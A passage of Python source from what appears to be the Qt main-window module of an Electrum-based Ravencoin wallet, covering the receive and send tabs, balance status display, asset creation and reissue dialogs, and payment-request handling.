recv += self.format_amount_and_units(rvn)
if assets:
recv += ', '
assets = ['{}: {}'.format(asset, self.config.format_amount(val)) for asset, val in assets.items()]
recv += ', '.join(assets)
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), recv))
else:
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
recv = ''
rvn = tx_wallet_delta.delta.rvn_value
assets = tx_wallet_delta.delta.assets
recv += self.format_amount_and_units(rvn)
if assets:
recv += ', '
assets = ['{}: {}'.format(asset, self.config.format_amount(val)) for asset, val in assets.items()]
recv += ', '.join(assets)
self.notify(_("New transaction: {}").format(recv))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
self.request_list.refresh_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
self.notify_transactions()
def format_amount(self, amount_sat: int, is_diff=False, whitespaces=False) -> str:
"""Formats amount as string, converting to desired unit.
E.g. 500_000 -> '0.005'
"""
return self.config.format_amount(amount_sat, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount_sat, *, timestamp: int = None) -> str:
"""Returns string with both bitcoin and fiat amounts, in desired units.
E.g. 500_000 -> '0.005 BTC (191.42 EUR)'
"""
text = self.config.format_amount_and_units(amount_sat)
fiat = self.fx.format_amount_and_units(amount_sat, timestamp=timestamp) if self.fx else None
if text and fiat:
text += f' ({fiat})'
return text
def format_fiat_and_units(self, amount_sat) -> str:
"""Returns string of FX fiat amount, in desired units.
E.g. 500_000 -> '191.42 EUR'
"""
return self.fx.format_amount_and_units(amount_sat) if self.fx else ''
def format_fee_rate(self, fee_rate):
return self.config.format_fee_rate(fee_rate)
def get_decimal_point(self):
return self.config.get_decimal_point()
def base_unit(self):
return self.config.get_base_unit()
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
status_text = ''
local_height = self.network.get_local_height()
server_height = self.network.get_server_height()
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_lag = local_height - server_height
fork_str = "_fork" if len(self.network.get_blockchains()) > 1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if self.header_tracker:
if server_height < local_height + 100:
self.header_tracker.setVisible(True)
self.header_tracker.finished()
# Clean up memory
self.history_tab_layout.removeWidget(self.header_tracker)
self.header_tracker.deleteLater()
self.header_tracker = None
else:
self.header_tracker.calculate_stats(local_height, server_height)
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Syncing transactions..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png" % fork_str)
else:
c, u, x = self.wallet.get_balance()
c, u, x = c.rvn_value, u.rvn_value, x.rvn_value
text = _("Balance") + ": %s " % (self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]" % (self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]" % (self.format_amount(x, is_diff=True).strip())
if self.wallet.has_lightning():
l = self.wallet.lnworker.get_balance()
text += u' \U000026a1 %s' % (self.format_amount_and_units(l).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png" % fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png" % fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
if self.tray:
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_label.setText(status_text)
if self.status_button:
self.status_button.setIcon(icon)
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.asset_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
# self.channels_list.update_rows.emit(wallet)
self.update_completions()
self.refresh_send_tab()
if self.wallet.wallet_type not in ('imported, xpub'):
self.create_workspace.refresh_owners()
self.reissue_workspace.refresh_owners()
# def create_channels_tab(self):
# self.channels_list = ChannelsList(self)
# t = self.channels_list.get_toolbar()
# return self.create_list_tab(self.channels_list, t)
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
tab = self.create_list_tab(l, toolbar)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return tab
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_asset(self, asset):
from . import asset_dialog
d = asset_dialog.AssetDialog(self, asset)
d.exec_()
def hide_asset(self, asset):
self.asset_blacklist.append('^' + asset + '$')
self.config.set_key('asset_blacklist', self.asset_blacklist, True)
self.asset_list.update()
self.history_model.refresh('Marked asset as spam')
self.history_list.update()
def show_channel(self, channel_id):
from . import channel_details
channel_details.ChannelDetailsDialog(self, channel_id).show()
def show_transaction(self, tx, *, tx_desc=None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, parent=self, desc=tx_desc)
def show_lightning_transaction(self, tx_item):
from .lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx_item)
d.show()
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_message_e = FreezableLineEdit()
grid.addWidget(QLabel(_('Description')), 0, 0)
grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = RVNAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 1, 0)
grid.addWidget(self.receive_amount_e, 1, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.connect_fields(self, self.amount_e, self.fiat_send_e, None)
self.expires_combo = QComboBox()
evl = sorted(pr_expiration_values.items())
evl_keys = [i[0] for i in evl]
evl_values = [i[1] for i in evl]
default_expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
try:
i = evl_keys.index(default_expiry)
except ValueError:
i = 0
self.expires_combo.addItems(evl_values)
self.expires_combo.setCurrentIndex(i)
#self.expires_combo.setFixedWidth(self.receive_amount_e.width())
def on_expiry(i):
self.config.set_key('request_expiry', evl_keys[i])
self.expires_combo.currentIndexChanged.connect(on_expiry)
msg = ''.join([
_('Expiration date of your request.'), ' ',
_('This information is seen by the recipient if you send them a signed payment request.'),
'\n\n',
_('For on-chain requests, the address gets reserved until expiration. After that, it might get reused.'),
' ',
_('The ravencoin address never expires and will always be part of this electrum wallet.'), ' ',
_('You can reuse a ravencoin address any number of times but it is not good for your privacy.'),
'\n\n',
_('For Lightning requests, payments will not be accepted after the expiration.'),
])
grid.addWidget(HelpLabel(_('Expires after') + ' (?)', msg), 2, 0)
grid.addWidget(self.expires_combo, 2, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 2, 1)
self.clear_invoice_button = QPushButton(_('Clear'))
self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
self.create_invoice_button = QPushButton(_('New Address'))
self.create_invoice_button.setIcon(read_QIcon("ravencoin.png"))
self.create_invoice_button.setToolTip('Create on-chain request')
self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_invoice_button)
buttons.addWidget(self.create_invoice_button)
if self.wallet.has_lightning():
self.create_lightning_invoice_button = QPushButton(_('Lightning'))
self.create_lightning_invoice_button.setToolTip('Create lightning request')
self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png"))
self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True))
buttons.addWidget(self.create_lightning_invoice_button)
grid.addLayout(buttons, 4, 0, 1, -1)
self.receive_payreq_e = ButtonsTextEdit()
self.receive_payreq_e.setFont(QFont(MONOSPACE_FONT))
self.receive_payreq_e.addCopyButton(self.app)
self.receive_payreq_e.setReadOnly(True)
self.receive_payreq_e.textChanged.connect(self.update_receive_qr)
self.receive_payreq_e.setFocusPolicy(Qt.ClickFocus)
self.receive_qr = QRCodeWidget(fixedSize=220)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_address_e = ButtonsTextEdit()
self.receive_address_e.setFont(QFont(MONOSPACE_FONT))
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
qr_show = lambda: self.show_qrcode(str(self.receive_address_e.text()), _('Receiving address'), parent=self)
qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
self.receive_address_e.addButton(qr_icon, qr_show, _("Show as QR code"))
self.receive_requests_label = QLabel(_('Receive queue'))
from .request_list import RequestList
self.request_list = RequestList(self)
receive_tabs = QTabWidget()
receive_tabs.addTab(self.receive_address_e, _('Address'))
receive_tabs.addTab(self.receive_payreq_e, _('Request'))
receive_tabs.addTab(self.receive_qr, _('QR Code'))
receive_tabs.setCurrentIndex(self.config.get('receive_tabs_index', 0))
receive_tabs.currentChanged.connect(lambda i: self.config.set_key('receive_tabs_index', i))
receive_tabs_sp = receive_tabs.sizePolicy()
receive_tabs_sp.setRetainSizeWhenHidden(True)
receive_tabs.setSizePolicy(receive_tabs_sp)
def maybe_hide_receive_tabs():
receive_tabs.setVisible(bool(self.receive_payreq_e.text()))
self.receive_payreq_e.textChanged.connect(maybe_hide_receive_tabs)
maybe_hide_receive_tabs()
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addStretch()
hbox.addWidget(receive_tabs)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_requests(self, keys):
for key in keys:
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def delete_lightning_payreq(self, payreq_key):
self.wallet.lnworker.delete_invoice(payreq_key)
self.request_list.update()
self.invoice_list.update()
self.clear_receive_tab()
def sign_payment_request(self, addr):
alias = self.config.get('alias')
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
def create_invoice(self, is_lightning: bool):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
try:
if is_lightning:
if not self.wallet.lnworker.channels:
self.show_error(_("You need to open a Lightning channel first."))
return
# TODO maybe show a warning if amount exceeds lnworker.num_sats_can_receive (as in kivy)
key = self.wallet.lnworker.add_request(amount, message, expiry)
else:
key = self.create_bitcoin_request(amount, message, expiry)
if not key:
return
self.address_list.update()
except InvoiceError as e:
self.show_error(_('Error creating payment request') + ':\n' + str(e))
return
assert key is not None
self.request_list.update()
self.request_list.select_key(key)
# clear request fields
self.receive_amount_e.setText('')
self.receive_message_e.setText('')
# copy to clipboard
r = self.wallet.get_request(key)
content = r.invoice if r.is_lightning() else r.get_address()
title = _('Invoice') if is_lightning else _('Address')
self.do_copy(content, title=title)
def create_bitcoin_request(self, amount: int, message: str, expiration: int) -> Optional[str]:
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic(): # imported wallet
msg = [
_('No more addresses in your wallet.'), ' ',
_('You are using a non-deterministic wallet, which cannot create new addresses.'), ' ',
_('If you want to create new addresses, use a deterministic wallet instead.'), '\n\n',
_('Creating a new payment request will reuse one of your addresses and overwrite an existing request. Continue anyway?'),
]
if not self.question(''.join(msg)):
return
addr = self.wallet.get_receiving_address()
else: # deterministic wallet
if not self.question(
_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
return addr
def do_copy(self, content: str, *, title: str = None) -> None:
self.app.clipboard().setText(content)
if title is None:
tooltip_text = _("Text copied to clipboard").format(title)
else:
tooltip_text = _("{} copied to clipboard").format(title)
QToolTip.showText(QCursor.pos(), tooltip_text, self)
def clear_receive_tab(self):
self.receive_payreq_e.setText('')
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
self.request_list.clearSelection()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def update_receive_qr(self):
uri = str(self.receive_payreq_e.text())
if maybe_extract_bolt11_invoice(uri):
# encode lightning invoices as uppercase so QR encoding can use
# alphanumeric mode; resulting in smaller QR codes
uri = uri.upper()
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if is_address(addr) and self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def refresh_send_tab(self):
# Don't interrupt if we don't need to
balance = sum(self.wallet.get_balance(), RavenValue())
new_send_options = [util.decimal_point_to_base_unit_name(self.get_decimal_point())] + \
sorted([asset for asset, bal in balance.assets.items() if bal != 0])
diff = set(new_send_options) - set(self.send_options)
if self.send_options and not diff:
return
self.to_send_combo.clear()
self.send_options = new_send_options
self.to_send_combo.addItems(self.send_options)
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(1, 1)
from .paytoedit import PayToEdit
# Let user choose to send RVN or Asset
self.to_send_combo = QComboBox()
self.refresh_send_tab()
# self.amount_e = RVNAmountEdit(self.get_decimal_point)
self.amount_e = PayToAmountEdit(self.get_decimal_point,
lambda: self.send_options[self.to_send_combo.currentIndex()][:4])
self.payto_e = PayToEdit(self)
self.payto_e.addPasteButton(self.app)
msg = _('Recipient of the funds.') + '\n\n' \
+ _(
'You may enter a Ravencoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Ravencoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n' \
+ _(
'The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = SizedFreezableLineEdit(width=700)
grid.addWidget(self.message_e, 2, 1, 1, -1)
vis = self.config.get('enable_op_return_messages', False)
self.pubkey_e = FreezableLineEdit()
self.pubkey_e.setMaxLength(40) # Maximum length of an OP_RETURN message is 40. 1 byte for message length
self.pubkey_e.setMinimumWidth(700)
msg = _('OP_RETURN message.') + '\n\n' \
+ _('A short message to be encoded in a null pubkey') + ' ' \
+ _(
'Note that this is not an intented feature of Ravencoin and may be removed in the future.') + '\n\n' \
+ _('This will increase your fee slightly.')
self.pubkey_label = HelpLabel(_('OP_RETURN Message'), msg)
grid.addWidget(self.pubkey_label, 3, 0)
self.pubkey_label.setVisible(vis)
self.pubkey_e.setVisible(vis)
grid.addWidget(self.pubkey_e, 3, 1, 1, -1)
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _(
'Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
grid.addWidget(self.to_send_combo, 4, 2)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 3)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
def on_to_send():
i = self.to_send_combo.currentIndex()
self.fiat_send_e.setVisible(i == 0)
if i == 0:
reg = QRegExp('^[0-9]{0,11}\\.([0-9]{1,8})$')
else:
meta = self.wallet.get_asset_meta(self.send_options[i])
if meta:
divs = meta.divisions
if divs == 0:
reg = QRegExp('^[1-9][0-9]{0,10}$')
else:
reg = QRegExp('^[0-9]{0,11}\\.([0-9]{1,' + str(divs) + '})$')
else:
# For some reason we don't have asset data yet;
# give the user the most freedom
reg = QRegExp('^[0-9]{0,11}\\.([0-9]{1,8})$')
validator = QRegExpValidator(reg)
self.amount_e.setValidator(validator)
self.to_send_combo.currentIndexChanged.connect(on_to_send)
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(100)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 4, 4)
self.save_button = EnterButton(_("Save"), self.do_save_invoice)
self.send_button = EnterButton(_("Pay") + "...", self.do_pay)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.save_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 4)
self.amount_e.shortcut.connect(self.spend_max)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
# self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
self.set_onchain(False)
self.invoices_label = QLabel(_('Send queue'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
hbox.addStretch(1)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def create_messages_tab(self):
from .messages_list import MessageList
self.message_list = l = MessageList(self)
tab = self.create_list_tab(l)
return tab
def create_assets_tab(self):
from .asset_list import AssetList
self.asset_list = l = AssetList(self)
if self.wallet.wallet_type not in ('xpub',):
self.create_workspace = create_w = AssetCreateWorkspace(self,
self.confirm_asset_creation)
self.reissue_workspace = reissue_w = AssetReissueWorkspace(self,
self.confirm_asset_reissue)
else:
self.create_workspace = create_w = QLabel()
self.reissue_workspace = reissue_w = QLabel()
layout = QGridLayout()
w = QWidget()
w.setLayout(layout)
self.asset_tabs = tabwidget = QTabWidget()
tabwidget.addTab(l, "My Assets")
tabwidget.addTab(create_w, "Create Asset")
tabwidget.addTab(reissue_w, "Reissue Asset")
layout.addWidget(tabwidget, 0, 0)
return w
def confirm_asset_reissue(self):
error = self.reissue_workspace.verify_valid()
if error:
self.show_warning(_('Invalid asset metadata:\n'
'{}').format(error))
return
def show_small_association_warning():
if self.reissue_workspace.should_warn_associated_data():
cb = QCheckBox(_("Don't show this message again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
goto = self.question(_('Your associated data is smalled than the '
'34 byte size.\n'
'Double check that you have input the correct '
'data.\n'
'If you continue, null bytes will be prepended '
'to the end of your data to fit this size.\n\n'
'Is this okay?'),
title=_('Warning: Small associated data'), checkbox=cb)
if cb_checked:
self.config.set_key('warn_asset_small_associated', False)
if goto:
return True
else:
return False
else:
return True
def show_non_reissuable_warning():
if self.reissue_workspace.should_warn_on_non_reissuable():
cb = QCheckBox(_("Don't show this message again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
goto = self.question(_('You will not be able to change '
'this asset in the future.\n'
'Are you sure you want to continue?'),
title=_('Warning: Non reissuable asset'), checkbox=cb)
if cb_checked:
self.config.set_key('warn_asset_non_reissuable', False)
if goto:
return True
else:
return False
else:
return True
if not show_small_association_warning():
return
if not show_non_reissuable_warning():
return
norm, new, change_addr = self.reissue_workspace.get_output()
self.pay_onchain_dialog(
self.get_coins(asset=self.reissue_workspace.get_owner()),
norm,
coinbase_outputs=new,
# change_addr=change_addr
)
self.reissue_workspace.reset_workspace()
def confirm_asset_creation(self):
error = self.create_workspace.verify_valid()
if error:
self.show_warning(_('Invalid asset metadata:\n'
'{}').format(error))
return
def show_small_association_warning():
if self.create_workspace.should_warn_associated_data():
cb = QCheckBox(_("Don't show this message again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
goto = self.question(_('Your associated data is smalled than the '
'34 byte size.\n'
'Double check that you have input the correct '
'data.\n'
'If you continue, null bytes will be prepended '
'to the end of your data to fit this size.\n\n'
'Is this okay?'),
title=_('Warning: Small associated data'), checkbox=cb)
if cb_checked:
self.config.set_key('warn_asset_small_associated', False)
if goto:
return True
else:
return False
else:
return True
def show_non_reissuable_warning():
if self.create_workspace.should_warn_on_non_reissuable():
cb = QCheckBox(_("Don't show this message again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
goto = self.question(_('You will not be able to change '
'this asset in the future.\n'
'Are you sure you want to continue?'),
title=_('Warning: Non reissuable asset'), checkbox=cb)
if cb_checked:
self.config.set_key('warn_asset_non_reissuable', False)
if goto:
return True
else:
return False
else:
return True
if not show_small_association_warning():
return
if not show_non_reissuable_warning():
return
norm, new, change_addr = self.create_workspace.get_output()
self.pay_onchain_dialog(
self.get_coins(asset=self.create_workspace.get_owner()),
norm,
coinbase_outputs=new,
#change_addr=change_addr
)
self.create_workspace.reset_workspace()
def get_asset_from_spend_tab(self) -> Optional[str]:
combo_index = self.to_send_combo.currentIndex()
if combo_index != 0:
return self.send_options[combo_index]
return None
def spend_max(self):
if run_hook('abort_send', self):
return
asset = self.get_asset_from_spend_tab()
outputs = self.payto_e.get_outputs(True)
if not outputs:
return
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=self.get_coins(asset=asset),
outputs=outputs,
fee=fee_est,
is_sweep=False)
try:
try:
tx = make_tx(None)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
tx = make_tx(0)
except MultipleSpendMaxTxOutputs as e:
self.max_button.setChecked(False)
self.show_error(str(e))
return
except NotEnoughFunds as e:
self.max_button.setChecked(False)
text = self.get_text_not_enough_funds_mentioning_frozen()
self.show_error(text)
return
self.max_button.setChecked(True)
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - RavenValue(x_fee_amount)
assets = amount_after_all_fees.assets
if len(assets) == 0:
to_show = amount_after_all_fees.rvn_value.value
else:
__, v = list(assets.items())[0]
to_show = v.value
self.amount_e.setAmount(to_show)
# show tooltip explaining max amount
mining_fee = tx.get_fee()
mining_fee_str = self.format_amount_and_units(mining_fee.rvn_value.value)
msg = _("Mining fee: {} (can be adjusted on next screen)").format(mining_fee_str)
if x_fee_amount:
twofactor_fee_str = self.format_amount_and_units(x_fee_amount)
msg += "\n" + _("2fa fee: {} (for the next batch of transactions)").format(twofactor_fee_str)
frozen_bal = self.get_frozen_balance_str()
if frozen_bal:
msg += "\n" + _("Some coins are frozen: {} (can be unfrozen in the Addresses or in the Coins tab)").format(
frozen_bal)
QToolTip.showText(self.max_button.mapToGlobal(QPoint(0, 0)), msg)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
@protected
def protect(self, func, args, password):
return func(*args, password)
def read_outputs(self) -> List[PartialTxOutput]:
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.scriptpubkey is None:
self.show_error(_('Ravencoin Address is None'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def check_send_tab_payto_line_and_show_errors(self) -> bool:
"""Returns whether there are errors.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
if len(errors) == 1 and not errors[0].is_multiline:
err = errors[0]
self.show_warning(_("Failed to parse 'Pay to' line") + ":\n" +
f"{err.line_content[:40]}...\n\n"
f"{err.exc!r}")
else:
self.show_warning(_("Invalid Lines found:") + "\n\n" +
'\n'.join([_("Line #") +
f"{err.idx + 1}: {err.line_content[:40]}... ({err.exc!r})"
for err in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
return False # no errors
def pay_lightning_invoice(self, invoice: str, *, amount_msat: Optional[int]):
if amount_msat is None:
raise Exception("missing amount for LN invoice")
amount_sat = Decimal(amount_msat) / 1000
# FIXME this is currently lying to user as we truncate to satoshis
msg = _("Pay lightning invoice?") + '\n\n' + _("This will send {}?").format(
self.format_amount_and_units(amount_sat))
if not self.question(msg):
return
self.save_pending_invoice()
def task():
